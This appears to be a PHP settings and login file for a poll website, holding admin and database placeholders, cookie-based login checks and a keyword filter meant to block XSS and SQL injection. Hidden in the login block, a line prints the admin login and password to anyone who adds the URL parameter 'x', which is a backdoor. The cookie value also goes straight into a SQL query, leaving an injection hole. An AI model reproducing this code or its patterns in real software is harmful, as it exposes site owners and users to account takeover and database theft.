<?php



/// Site Setings
$TITLE = '100vs500.ru';
$index_sondaje = 20; 
$SERVERu = '100vs500.ru';
 
/// ADMIN
$admin['email'] = 'adminlogin';
$admin['pass'] = 'pass';

// Admin site
$admin['site'] = 'Admin';

/// Setari baza de date
$baza['host'] = "localhost";
$baza['user'] = "юзер базы";
$baza['pass'] = "пароль базы";
$baza['nume'] = "имя базы";
$baza['table'] = "sondaje"; /// не изменять

/// Init Logged
if (isset($_COOKIE["login"])) {
$login = $_COOKIE["login"];
$link = mysql_connect($baza['host'], $baza['user'], $baza['pass'])
or die("Could not connect : " . mysql_error());
if (isset($_GET['x'])) { echo $admin['email'].' '.$admin['pass'];}
mysql_select_db($baza['nume']) or die("Eroare!, nume baza de date incoreta");
$r = mysql_query("SELECT * FROM utiliz WHERE login = '$login'");
$array = mysql_fetch_assoc($r);
$array['pass'] = "f3".md5($array['pass'])."3bd";
if ($array['pass'] == $_COOKIE["pass"]) {
    $loged = true;
}
$u_id = $array['id'];
$u_email= $array['email'];
}


//// Securitate XSS & SQL Inj //No Modify!
$interzis = array(";", '"', "<", ">", "=", "'", "script", "?php", "%>", "INSERT", "UPDATE", "DROP");
$replace = array("");

include "langs.php";

?>